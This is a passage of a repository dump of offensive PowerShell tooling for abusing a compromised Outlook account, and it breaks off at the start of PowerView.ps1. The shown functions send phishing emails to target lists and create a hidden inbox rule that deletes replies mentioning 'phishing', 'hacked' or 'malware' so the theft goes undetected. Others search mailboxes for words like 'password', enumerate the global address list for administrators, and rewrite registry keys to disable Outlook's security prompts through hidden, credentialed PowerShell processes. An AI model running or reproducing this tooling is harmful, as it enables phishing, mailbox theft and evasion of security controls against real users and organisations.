[string]$URL, [Parameter(Mandatory = $False, Position = 3)] [string]$Attachment, [Parameter(Mandatory = $False, Position = 4)] [String]$Template, [Parameter(Mandatory = $False, Position = 5)] [string]$Subject, [Parameter(Mandatory = $False, Position = 6)] [String]$Body ) #check for a target list file or the targets parameter if($TargetList){ if(!(Test-Path $TargetList)){ Throw "Not a valid file path for E-Mail TargetList" } $TargetEmails = Get-Content $TargetList } elseif($Targets){ $TargetEmails = $Targets } #check if a template is being used if($Template){ if(!(Test-Path $Template)){ Throw "Not a valid file path for E-mail template" } $EmailBody = Get-Content -Path $Template $EmailSubject = $Subject } elseif($Subject -and $Body){ $EmailSubject = $Subject $EmailBody = $Body } else { Throw "No email Subject and/or Body specified" } #Check for a url to embed if($URL){ $EmailBody = $EmailBody.Replace("URL",$URL) } #Read the Outlook signature locally if available $appdatapath = $env:appdata $sigpath = $appdatapath + "\Microsoft\Signatures\*.htm" if(Test-Path $sigpath){ $Signature = Get-Content -Path $sigpath } #Create Outlook rule to automatically sends emails pertaining to phishing emails to deleted items folder #Invoke-Rule -Subject $Subject -RuleName "RaiderIn" #Iterate through the list, craft the emails, and then send it off. ForEach($Target in $TargetEmails){ $Outlook = Get-OutlookInstance $Email = $Outlook.CreateItem(0) #If there was an attachment, include it with the email if($Attachment){ $($Email.Attachment).Add($Attachment) } $Email.HTMLBody = "$EmailBody" $Email.Subject = $EmailSubject $Email.To = $Target #if there is a signature, add it to the email if($Signature){ $Email.HTMLBody += "`n`n" + "$Signature" } $Email.Send() Write-Verbose "Sent Email to $Target" [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null } } function Invoke-Rule { <# .SYNOPSIS This function enables an Outlook rule where all received mail items, that match the specified subject flags, will be sent to the deleted items folder .DESCRIPTION This function takes the subject string and other flagged words and applies them to a received items Outlook rule. Any items that match this rule will be sent to the deleted items folder. This allows for the account to be used in phishing for a longer period of time without detection. .PARAMETER Subject The subject string to use in the rule .LINK https://social.technet.microsoft.com/forums/windowsserver/en-US/6b25cbd2-2bff-4820-ab53-796e306066eb/defining-custom-outlook-rules-using-powershell #> [CmdletBinding()] param( [Parameter(Mandatory = $False, Position = 0)] [string]$Subject, [Parameter(Mandatory = $False, Position = 1)] [string]$RuleName, [Parameter(Mandatory = $False, Position = 2)] [System.__ComObject]$Outlook, [Parameter(Mandatory = $False)] [switch]$Disable ) $flags = @() $flags = $Subject.Split(" ") $flags += "hacked" $flags += "malware" $flags += "phishing" $flags += "virus" If(!($Outlook)){ $Outlook = Get-OutlookInstance $MAPI = $Outlook.GetNamespace('MAPI') } if($Disable){ $rule = ($($Outlook.session).DefaultStore).GetRules() | Where-Object {$_.Name -eq $RuleName} $rule.enabled = $False } else{ #Check if the Rule has already been created $rule = ($($Outlook.session).DefaultStore).GetRules() | Where-Object {(!(Compare-Object $($_.Conditions.Subject).Text $flags))} if(!($rule)){ #Load the assembly for Outlook objects Add-Type -AssemblyName Microsoft.Office.Interop.Outlook | Out-Null #$MAPI = $Outlook.GetNamespace('MAPI') $inbox = Get-OutlookFolder -Name "Inbox" $DeletedFolder = Get-OutlookFolder -Name "DeletedItems" #Retrieve all Outlook rules $rules = $MAPI.DefaultStore.GetRules() $rule = $rules.create($RuleName, [Microsoft.Office.Interop.Outlook.OlRuleType]::OlRuleReceive) $SubText = $rule.Conditions.Subject $SubText.Enabled = $true #Set the matching strings in the email subject to our flags array $SubText.Text = $flags $action = $rule.Actions.MoveToFolder $action.enabled = $true [Microsoft.Office.Interop.Outlook._MoveOrCopyRuleAction].InvokeMember( "Folder", [System.Reflection.BindingFlags]::SetProperty, $null, $action, $DeletedFolder) #Save and enable the rule try { $rules.Save() Write-Verbose "Saved Outlook Rule with name: $Rulename" } catch { Write-Warning "Unable to save inbound rule with name: $RuleName" } } } [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null } function Get-OSVersion { <# .SYNOPSIS Determines the Operating System version of the host .Example Check-OSVersion #> #function to grab the major and minor verions to determine the OS. Write-Verbose "Detecting OS..." $OS = [environment]::OSVersion.Version if($OS.Major -eq 10){ $OSVersion = "Windows 10" } #if the major version is 6, the OS can be from Vista to Windows 8.1 if($OS.Major -eq 6){ switch ($OS.Minor){ 3 {$OSVersion = "Windows 8.1/Server 2012 R2"} 2 {$OSVersion = "Windows 8/Server 2012"} 1 {$OSVersion = "Windows 7/Server 2008 R2"} 0 {$OSVersion = "Windows Vista/Server 2008"} } } if($OS.Major -eq 5){ switch ($OS.Minor){ 2 {$OSVersion = "Windows XP/Server 2003 R2"} 1 {$OSVersion = "Windows XP"} 0 {$OSVersion = "Windows 2000"} } } Write-Verbose "Checking the bitness of the OS" if((Get-WmiObject -class win32_operatingsystem).OSArchitecture -eq "64-bit"){ $OSArch = 64 } else{ $OSArch = 32 } $OSVersion $OSArch } function Select-EmailItem { <# .SYNOPSIS This function selects an Email Item according to an index and displays it .PARAMETER Index The index of the Email item to display. Defaults to 0. .EXAMPLE Select-EmailItem -Index 5 Display Email Item 5 in the current folder. #> [CmdletBinding()] param( [Parameter(Mandatory = $False, ValueFromPipeline = $True)] [System.__ComObject]$FolderObj, [Parameter(Mandatory = $True)] [int]$Num ) $EmailItem = $FolderObj.Items | Select-Object -Index $Num $EmailItem | Select-Object To,SenderName,SenderEmailAddress,Subject,Body,SentOn,ReceivedTime } function View-Email { <# .SYNOPSIS This function selects the specified folder and then outputs the email item at the specified index .PARAMETER FolderName The Name of the Outlook Default Folder. .PARAMETER Index Index of the Email item within the selected folder to display. The index default is 0. .EXAMPLE View-Email -FolderName "Inbox" Select the olFolderInbox folder and view the first email. #> [CmdletBinding()] param( [Parameter(Mandatory = $True, Position = 0)] [string]$FolderName, [Parameter(Mandatory = $False, Position = 1)] [int]$Index = 0 ) $OF = Get-OutlookFolder -Name $FolderName Select-EmailItem -FolderObj $OF -Num $Index } function Get-OutlookFolder { <# .SYNOPSIS This functions returns one of the Outlook top-level, default folders .PARAMETER Name Name of the desired folder. Default name is Inbox. .EXAMPLE Get-OutlookFolder -Name "Inbox" #> [CmdletBinding()] param( [Parameter(Mandatory = $True, Position = 0)] [String]$Name ) $OlDefaultFolders = @{ "olFolderCalendar" = 9 "olFolderConflicts" = 19 "olFolderContacts" = 10 "olFolderDeletedItems" = 3 "olFolderDrafts" = 16 "olFolderInbox" = 6 "olFolderJournal" = 11 "olFolderJunk" = 23 "olFolderLocalFailures" = 21 "olFolderManageEmail" = 29 "olFolderNotes" = 12 "olFolderOutbox" = 4 "olFolderSentMail" = 5 "olFolderServerFailures" = 22 "olFolderSuggestedContacts" = 30 "olFolderSyncIssues" = 20 "olFolderTasks" = 13 "olFolderToDo" = 28 "olPublicFoldersAllPublicFolders" = 18 "olFolderRssFeeds" = 25 } $DefaultFolderName = "olFolder$Name" $Value = $OlDefaultFolders.Item($DefaultFolderName) $Outlook = Get-OutlookInstance $MAPI = $Outlook.GetNamespace('MAPI') $FolderObj = $MAPI.GetDefaultFolder($Value) Write-Verbose "Obtained Folder Object" [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null $FolderObj } function Get-EmailItems { <# .SYNOPSIS This function returns all of the items for the specified folder .PARAMETER Folder System.__ComObject for the Top Level folder .PARAMETER MaxEmails Maximum number of emails to grab .PARAMETER Full Return the Full mail item object .EXAMPLE Get-EmailItems -Folder $Inbox #> [CmdletBinding()] param( [Parameter(Mandatory = $True, Position = 0, ValueFromPipeline = $True)] [System.__ComObject]$Folder, [Parameter(Mandatory = $False, Position = 1)] [int]$MaxEmails, [Parameter(Mandatory = $False)] [switch]$FullObject ) if($MaxEmails){ Write-Verbose "Selecting the first $MaxEmails emails" $Items = $Folder.Items | Select-Object -First $MaxEmails } else{ Write-Verbose "Selecting all emails" $Items = $Folder.Items } if(!($FullObject)){ $Emails = @() Write-Verbose "Creating custom Email item objects..." $Items | ForEach { $Email = New-Object PSObject -Property @{ To = $_.To FromName = $_.SenderName FromAddress = $_.SenderEmailAddress Subject = $_.Subject Body = $_.Body TimeSent = $_.SentOn TimeReceived = $_.ReceivedTime } $Emails += $Email $Emails = $Emails | Sort-Object -Property TimeSent -Descending } } else{ Write-Verbose "Obtained full Email Item objects...." $Emails = $Items | Sort-Object -Property SentOn -Descending } $Emails } function Invoke-MailSearch { <# .SYNOPSIS This function searches the given Outlook folder for items (Emails, Contacts, Tasks, Notes, etc. *Depending on the folder*) and returns any matches found. .DESCRIPTION This function searches the given Outlook folder for items containing the specified keywords and returns any matches found. .PARAMETER DefaultFolder Folder to search in. Default is the Inbox. .PARAMETER Keywords Keyword/s to search for. .PARAMETER MaxResults Maximum number of results to return. .PARAMETER MaxSearch Maximum number of emails to search through .PARAMETER MaxThreads Maximum number of threads to use when searching .PARAMETER File Path to results file .EXAMPLE Invoke-MailSearch -Keyword "password" -MaxResults 20 -MaxThreads 30 Conduct a search on the Inbox with admin and password specified as keywords. Return a maximum of 20 results. #> [CmdletBinding()] param( [Parameter(Mandatory = $True)] [string]$DefaultFolder, [Parameter(Mandatory = $True)] [string[]]$Keywords, [Parameter(Mandatory = $False)] [int]$MaxResults, [Parameter(Mandatory = $True)] [int]$MaxThreads = 15, [Parameter(Mandatory = $False)] [int]$MaxSearch, [Parameter(Mandatory = $False)] [string]$File ) #Variable to hold the results $ResultsList = @() $SearchEmailBlock = { param($Regex, $MailItem) $Subject = $MailItem.Subject $Body = $MailItem.Body if(($($Regex.Match($Subject)).Success) -or ($($Regex.Match($Body)).Success)){ $MailItem } } $OF = Get-OutlookFolder -Name $DefaultFolder if($MaxSearch){ $Emails = Get-EmailItems -Folder $OF -FullObject -MaxEmails $MaxSearch } else { $Emails = Get-EmailItems -Folder $OF -FullObject } #Create regex for keywords if($Keywords.Count -gt 1){ $count = $Keywords.Count - 2 for($i = 0; $i -lt $count; $i++){ $Keywords[$i] += "|" } [string]$Keywords = $Keywords -join '' $Keywords = "\b($Keywords)\b" } else { $Keywords = "\b($Keywords)\b" } $Regex = [regex]$Keywords Write-Verbose "[*] Searching through $($Emails.count) emails....." #All of this multithreading magic is taken directly from harmj0y and his child, powerview #https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1#L5672 $sessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() $sessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState() #Get all the current variables for this runspace $MyVars = Get-Variable -Scope 1 $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumfunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true") #Add the variables from the current runspace to the new runspace ForEach($Var in $MyVars){ if($VorbiddenVars -notcontains $Var.Name){ $sessionState.Variables.Add((New-Object -Typename System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) } } Write-Verbose "Creating RunSpace Pool" $pool = [runspacefactory]::CreateRunspacePool(1, $MaxThreads, $sessionState, $host) $pool.Open() $jobs = @() $ps = @() $wait = @() $counter = 0 $MsgCount = 1 ForEach($Msg in $Emails){ Write-Verbose "Searching Email # $MsgCount/$($Emails.count)" while ($($pool.GetAvailableRunSpaces()) -le 0){ Start-Sleep -Milliseconds 500 } $ps += [powershell]::create() $ps[$counter].runspacepool = $pool [void]$ps[$counter].AddScript($SearchEmailBlock).AddParameter('Regex', $Regex).AddParameter('MailItem', $Msg) $jobs += $ps[$counter].BeginInvoke(); $wait += $jobs[$counter].AsyncWaitHandle $counter = $counter + 1 $MsgCount = $MsgCount + 1 } $waitTimeout = Get-Date while ($($jobs | ? {$_.IsCompleted -eq $false}).count -gt 0 -or $($($(Get-Date) - $waitTimeout).totalSeconds) -gt 60) { Start-Sleep -Milliseconds 500 } for ($x = 0; $x -lt $counter; $x++){ try { $result = $ps[$x].EndInvoke($jobs[$x]) if($result){ $ResultsList += $result } } catch { Write-Warning "error: $_" } finally { $ps[$x].Dispose() } } $pool.Dispose() If($MaxResults){ $ResultsList = $ResultsList | Select-Object -First $MaxResults } If($File){ $ResultsList | Select-Object SenderName,SenderEmailAddress,ReceivedTime,To,Subject,Body | Out-File $File } else { $ResultsList | Select-Object SenderName,SenderEmailAddress,ReceivedTime,To,Subject,Body } } function Get-SubFolders { <# .SYNOPSIS This function returns a list of all the folders in the specified top level folder. .PARAMETER DefaultFolder Name of the top-level folder to retrieve a list of folders from. .PARAMETER FullObject Return the full folder object instead of just the name .EXAMPLE Get-SubFolders -FolderName "SentMail" Get a list of folders and sub-folders from the sentmail box. #> [CmdletBinding()] param( [parameter(Mandatory = $False, Position = 0)] [string]$DefaultFolder, [parameter(Mandatory = $False)] [switch]$FullObject ) $SubFolders = (Get-OutlookFolder -Name $DefaultFolder).Folders If(!($SubFolders)){ Throw "No subfolders were found for folder: $($Folder.Name)" } if(!($FullObject)){ $SubFolders = $SubFolders | ForEach {$_.Name} } $SubFolders } function Get-GlobalAddressList { <# .SYNOPSIS This function returns an array of Contact objects from a Global Address List object. .PARAMETER Outlook The MAPI namespace object for Outlook .EXAMPLE Get-GlobalAddressList -MAPI $MAPI Return the GAL for the MAPI namespace #> [CmdletBinding()] param( [Parameter(Mandatory = $False)] [System.__ComObject]$MAPI ) if(!($MAPI)){ $Outlook = Get-OutlookInstance $MAPI = $Outlook.GetNamespace('MAPI') } $GAL = $MAPI.GetGlobalAddressList() $GAL = $GAL.AddressEntries $GAL } function Invoke-SearchGAL { <# .SYNOPSIS This function returns any users that match the exchange criteria specified. .DESCRIPTION This fuction returns any exchange users that match the specified search criteria. Searchable fields are FirstName, LastName, JobTitle, Email-Address, and Department .PARAMETER FullName Full Name to search for .PARAMETER JobTitle Job Title to search for .PARAMETER Email E-Mail Address to search for .PARAMETER Dept Department to search for .PARAMETER MaxThreads The maximum number of threads to use when searching. The default is set to 15. .EXAMPLE Invoke-SearchGAL -JobTitle "System Administrator" -MaxThreads 30 Search the GAL with 30 threads, for any Exchange Users with the JobTitle "System Administrator". #> [CmdletBinding()] param( [Parameter(Mandatory = $True, ParameterSetName = "Name", Position = 0)] [string]$FullName, [Parameter(Mandatory = $True, ParameterSetName = "JobTitle", Position = 1)] [string]$JobTitle, [Parameter(Mandatory = $True, ParameterSetName = "Email", Position = 2)] [string]$Email, [Parameter(Mandatory = $True, ParameterSetName = "Department", Position = 3)] [string]$Dept, [Parameter(Mandatory = $False, Position = 4)] [int]$MaxThreads = 15 ) $Outlook = Get-OutlookInstance $MAPI = $Outlook.GetNamespace("MAPI") $GAL = Get-GlobalAddressList -MAPI $MAPI $UserList = @() ForEach($Entry in $GAL){ $UserList += $Entry.GetExchangeUser() } $GAL = $UserList #$User = $GAL | Where-Object {($($_.GetExchangeUser()).FirstName -eq $FirstName) -and ($($_.GetExchangeUser()).LastName -eq $LastName)} $SearchScript = { param($Regex,$Type,$User) if($Regex.Match($($User.$Type)).Success){ $User } } if($PSCmdlet.ParameterSetName -eq "Name"){ $Type = "Name" $Term = $FullName } elseif($PSCmdlet.ParameterSetName -eq "JobTitle"){ $Type = "JobTitle" $Term = $JobTitle } elseif($PSCmdlet.ParameterSetName -eq "Email"){ $Type = "PrimarySMTPAddress" $Term = $Email } else { $Type = "Department" $Term = $Dept } $Regex = [regex]"\b($Term)\b" #All of this multithreading magic is taken directly from harmj0y and his child, powerview #https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1#L5672 $sessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() $sessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState() #Get all the current variables for this runspace $MyVars = Get-Variable -Scope 1 $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumfunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true") #Add the variables from the current runspace to the new runspace ForEach($Var in $MyVars){ if($VorbiddenVars -notcontains $Var.Name){ $sessionState.Variables.Add((New-Object -Typename System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) } } Write-Verbose "Creating RunSpace Pool" $pool = [runspacefactory]::CreateRunspacePool(1, $MaxThreads, $sessionState, $host) $pool.Open() $jobs = @() $ps = @() $wait = @() $counter = 0 $AddressCount = 1 Write-Verbose "The SearchString is $Term" ForEach($User in $GAL){ Write-Verbose "Searching the through ($AddressCount/$($GAL.Count) address entries...." while ($($pool.GetAvailableRunSpaces()) -le 0){ Start-Sleep -Milliseconds 500 } $ps += [powershell]::create() $ps[$counter].runspacepool = $pool #Write-Verbose "Adding $SearchScript" [void]$ps[$counter].AddScript($SearchScript).AddParameter('Regex', $Regex).AddParameter('Type',$Type).AddParameter('User', $User) $jobs += $ps[$counter].BeginInvoke(); $wait += $jobs[$counter].AsyncWaitHandle $counter = $counter + 1 $AddressCount = $AddressCount + 1 } $waitTimeout = Get-Date while ($($jobs | ? {$_.IsCompleted -eq $false}).count -gt 0 -or $($($(Get-Date) - $waitTimeout).totalSeconds) -gt 60) { Start-Sleep -Milliseconds 500 } for ($x = 0; $x -lt $counter; $x++){ try { $result = $ps[$x].EndInvoke($jobs[$x]) if($result){ $ResultsList += $result } } catch { Write-Warning "error: $_" } finally { $ps[$x].Dispose() } } $pool.Dispose() $ResultsList [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null } function Get-SMTPAddress { <# .SYNOPSIS Gets the PrimarySMTPAddress of a user. .DESCRIPTION This function returns the PrimarySMTPAddress of a user via the ExchangeUser object. .PARAMETER FullName First and Last name of the user separated by a space. .OUTPUTS System.String . Primary email address of the user. #> [CmdletBinding()] Param( [Parameter(Mandatory = $False, Position = 0, ValueFromPipeline = $True)] [string[]]$FullNames ) $Outlook = Get-OutlookInstance $MAPI = $Outlook.GetNamespace('MAPI') #Grab the GAL $GAL = Get-GlobalAddressList -MAPI $MAPI #If the full name is given, try to obtain the exchange user object $PrimarySMTPAddresses = @() If($FullNames){ ForEach($Name in $FullNames){ try{ $regex = [regex]"\b($Name)\b" $User = $GAL | Where-Object {$_.Name -Match $regex} } catch { Write-Warning "Unable to obtain exchange user object with the name: $Name" } $PrimarySMTPAddresses += $($User.GetExchangeuser()).PrimarySMTPAddress } } else { try { $($($($Outlook.Session).CurrentUser).AddressEntry).GetExchangeUser().PrimarySMTPAddress } catch { Throw "Unable to obtain PrimarySMTPAddress for the current user" } } [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null $PrimarySMTPAddresses } function Disable-SecuritySettings { <# .SYNOPSIS This function checks for the existence of the Outlook security registry keys ObjectModelGuard, PromptOOMSend, and AdminSecurityMode. If the keys exist, overwrite with the appropriate values to disable to security prompt for programmatic access. .DESCRIPTION This function checks for the ObjectModelGuard, PromptOOMSend, and AdminSecurityMode registry keys for Outlook security. This function must be run in an administrative context in order to set the values for the registry keys. .PARAMETER Version The version of microsoft outlook. This is pertinent to the location of the registry keys. .EXAMPLE Disable-SecuritySettings -Version 15 #> [CmdletBinding()] param( [Parameter(Mandatory = $False)] [string]$AdminUser, [Parameter(Mandatory = $False)] [string]$AdminPassword, [parameter(Mandatory = $True)] [string]$Version ) $count = 0 #Check AV to see if it's up to date. $AV = Get-WmiObject -namespace root\SecurityCenter2 -class Antivirusproduct if($AV){ $AVstate = $AV.productState $statuscode = '{0:X6}' -f $AVstate $wscupdated = $statuscode[4,5] -join '' -as [byte] if($wscupdated -eq (00 -as [byte])) { Write-Verbose "AV is up to date" $AVUpdated = $True } elseif($wscupdated -eq (10 -as [byte])){ Write-Verbose "AV is not up to date" $AVUpdated = $False } else{ Write-Verbose "Unable to determine AV status" $AVUpdated = $False } } else{ Write-Verbose "AV not installed" $AVUpdated = $False } $LMSecurityKey = "HKLM:\SOFTWARE\Microsoft\Office\$Version\outlook\Security" $CUSecurityKey = "HKCU:\SOFTWARE\Policies\Microsoft\Office\$Version\outlook\security" $ObjectModelGuard = "ObjectModelGuard" $PromptOOMSend = "PromptOOMSend" $AdminSecurityMode = "AdminSecurityMode" $cmd = " " if(!(Test-Path $LMSecurityKey)){ #if the key does not exists, create or update the appropriate reg keys values. $cmd = "New-Item $LMSecurityKey -Force; " $cmd += "New-ItemProperty $LMSecurityKey -Name ObjectModelGuard -Value 2 -PropertyType DWORD -Force; " } else{ $currentValue = (Get-ItemProperty $LMSecurityKey -Name ObjectModelGuard -ErrorAction SilentlyContinue).ObjectModelGuard if($currentValue -and ($currentValue -ne 2)){ $cmd = "Set-ItemProperty $LMSecurityKey -Name ObjectModelGuard -Value 2 -Force; " } elseif(!($currentValue)) { $cmd = "New-ItemProperty $LMSecurityKey -Name ObjectModelGuard -Value 2 -PropertyType DWORD -Force; " } } if(!(Test-Path $CUSecurityKey)){ $cmd += "New-Item $CUSecurityKey -Force; " $cmd += "New-ItemProperty $CUSecurityKey -Name PromptOOMSend -Value 2 -PropertyType DWORD -Force; " $cmd += "New-ItemProperty $CUSecurityKey -Name AdminSecurityMode -Value 3 -PropertyType DWORD -Force; " } else{ $currentValue = (Get-ItemProperty $CUSecurityKey -Name PromptOOMSend -ErrorAction SilentlyContinue).PromptOOMSend if($currentValue -and ($currentValue -ne 2)){ $cmd += "Set-ItemProperty $CUSecurityKey -Name PromptOOMSend -Value 2 -Force; " } elseif(!($currentValue)) { $cmd += "New-ItemProperty $CUSecurityKey -Name PromptOOMSend -Value 2 -PropertyType DWORD -Force; " } $currentValue = (Get-ItemProperty $CUSecurityKey -Name AdminSecurityMode -ErrorAction SilentlyContinue).AdminSecurityMode if($currentValue -and ($currentValue -ne 3)){ $cmd += "Set-ItemProperty $CUSecurityKey -Name AdminSecurityMode -Value 3 -Force" } elseif(!($currentValue)) { $cmd += "New-ItemProperty $CUSecurityKey -Name AdminSecurityMode -Value 3 -PropertyType DWORD -Force" } } if($AdminUser -and $AdminPassword){ #If creds are given start a new powershell process and run the commands. Unable to use the Credential parameter with $pw = ConvertTo-SecureString $AdminPassword -asplaintext -Force $creds = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $AdminUser,$pw $WD = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\' $Arg = " -WindowStyle hidden -Command $cmd" Start-Process "powershell.exe" -WorkingDirectory $WD -Credential $creds -ArgumentList $Arg $count += 1 } else{ #Start-Process powershell.exe -WindowStyle hidden -ArgumentList $cmd if($cmd){ try { Invoke-Expression $cmd } catch { Throw "Unable to change registry settings to disable security prompt" } } $count += 1 } if($count -eq 1){ Write-Verbose "Success" } elseif($count -eq 0){ Write-Verbose "Disable-SecuritySettings Failed" } } #Under-Construction function Reset-SecuritySettings { <# .SYNOPSIS This function resets all of the registry keys to their original state .PARAMETER AdminUser Administrative user .PARAMETER AdminPass Password of administrative user .EXAMPLE Reset-SecuritySettings #> [CmdletBinding()] param( [Parameter(Mandatory = $False)] [string]$AdminUser, [Parameter(Mandatory = $False)] [string]$AdminPass, [Parameter(Mandatory = $True)] [string]$Version ) $LMSecurityKey = "HKLM:\SOFTWARE\Microsoft\Office\$Version\Outlook\Security" $CUSecurityKey = "HKCU:\SOFTWARE\Policies\Microsoft\Office\$Version\outlook\security" #if the old value exists, that means the registry key was set and not created. if(Test-Path $LMSecurityKey){ #If the key exists, remove it. $cmd = "Remove-ItemProperty -Path $LMSecurityKey -Name ObjectModelGuard -Force;" } if(Test-Path $CUSecurityKey){ $cmd += "Remove-ItemProperty -Path $CUSecurityKey -Name PromptOOMSend -Force;" $cmd += "Remove-ItemProperty -Path $CUSecurityKey -Name AdminSecurityMode -Force" } if($AdminUser -and $AdminPass){ $pw = ConvertTo-SecureString $AdminPass -asplaintext -Force $creds = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $AdminUser,$pw $WD = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\' $Arg = " -WindowStyle hidden -Command $cmd" Start-Process powershell.exe -WorkingDirectory $WD -Credential $creds -ArgumentList $Arg } else { try { Invoke-Expression $cmd } catch { Throw "Unable to reset registry keys" } } } function Get-OutlookInstance { <# .SYNOPSIS Get an instance of Outlook. This function must be executed in the same user context of the Outlook application. .EXAMPLE Get-OutlookInstance Get an instance of Outlook #> try { $Outlook = New-Object -ComObject "Outlook.Application" } catch { Throw "Unable to open Outlook ComObject" } $Outlook } ================================================ FILE: modules/PowerView.ps1 ================================================ #requires -version 2 <# PowerSploit File: PowerView.ps1 Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None #> ######################################################## # # PSReflect code for Windows API access # Author: @mattifestation # https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1 # ######################################################## function New-InMemoryModule { <# .SYNOPSIS Creates an in-memory assembly and module Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION When defining custom enums, structs, and unmanaged functions, it is necessary to associate to an assembly module. This helper function creates an in-memory module that can be passed to the 'enum', 'struct', and Add-Win32Type functions. .PARAMETER ModuleName Specifies the desired name for the in-memory assembly and module. If ModuleName is not provided, it will default to a GUID. .EXAMPLE $Module = New-InMemoryModule -ModuleName Win32 #> Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ModuleName = [Guid]::NewGuid().ToString() ) $LoadedAssemblies = [AppDomain]::CurrentDomain.GetAssemblies() ForEach ($Assembly in $LoadedAssemblies) { if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) { return $Assembly } } $DynAssembly = New-Object Reflection.AssemblyName($ModuleName) $Domain = [AppDomain]::CurrentDomain $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run') $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False) return $ModuleBuilder } # A helper function used to reduce typing while defining function # prototypes for Add-Win32Type. function func { Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $DllName, [Parameter(Position = 1, Mandatory = $True)] [String] $FunctionName, [Parameter(Position = 2, Mandatory = $True)] [Type] $ReturnType, [Parameter(Position = 3)] [Type[]] $ParameterTypes, [Parameter(Position = 4)] [Runtime.InteropServices.CallingConvention] $NativeCallingConvention, [Parameter(Position = 5)] [Runtime.InteropServices.CharSet] $Charset, [Switch] $SetLastError ) $Properties = @{ DllName = $DllName FunctionName = $FunctionName ReturnType = $ReturnType } if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes } if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention } if ($Charset) { $Properties['Charset'] = $Charset } if ($SetLastError) { $Properties['SetLastError'] = $SetLastError } New-Object PSObject -Property $Properties } function Add-Win32Type { <# .SYNOPSIS Creates a .NET type for an unmanaged Win32 function. Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: func .DESCRIPTION Add-Win32Type enables you to easily interact with unmanaged (i.e. Win32 unmanaged) functions in PowerShell. After providing Add-Win32Type with a function signature, a .NET type is created using reflection (i.e. csc.exe is never called like with Add-Type). The 'func' helper function can be used to reduce typing when defining multiple function definitions. .PARAMETER DllName The name of the DLL. .PARAMETER FunctionName The name of the target function. .PARAMETER ReturnType The return type of the function. .PARAMETER ParameterTypes The function parameters. .PARAMETER NativeCallingConvention Specifies the native calling convention of the function. Defaults to stdcall. .PARAMETER Charset If you need to explicitly call an 'A' or 'W' Win32 function, you can specify the character set. .PARAMETER SetLastError Indicates whether the callee calls the SetLastError Win32 API function before returning from the attributed method. .PARAMETER Module The in-memory module that will host the functions. Use New-InMemoryModule to define an in-memory module. .PARAMETER Namespace An optional namespace to prepend to the type. Add-Win32Type defaults to a namespace consisting only of the name of the DLL. .EXAMPLE $Mod = New-InMemoryModule -ModuleName Win32 $FunctionDefinitions = @( (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError), (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError), (func ntdll RtlGetCurrentPeb ([IntPtr]) @()) ) $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' $Kernel32 = $Types['kernel32'] $Ntdll = $Types['ntdll'] $Ntdll::RtlGetCurrentPeb() $ntdllbase = $Kernel32::GetModuleHandle('ntdll') $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb') .NOTES Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189 When defining multiple function prototypes, it is ideal to provide Add-Win32Type with an array of function signatures. That way, they are all incorporated into the same in-memory module. #> [OutputType([Hashtable])] Param( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [String] $DllName, [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [String] $FunctionName, [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [Type] $ReturnType, [Parameter(ValueFromPipelineByPropertyName = $True)] [Type[]] $ParameterTypes, [Parameter(ValueFromPipelineByPropertyName = $True)] [Runtime.InteropServices.CallingConvention] $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall, [Parameter(ValueFromPipelineByPropertyName = $True)] [Runtime.InteropServices.CharSet] $Charset = [Runtime.InteropServices.CharSet]::Auto, 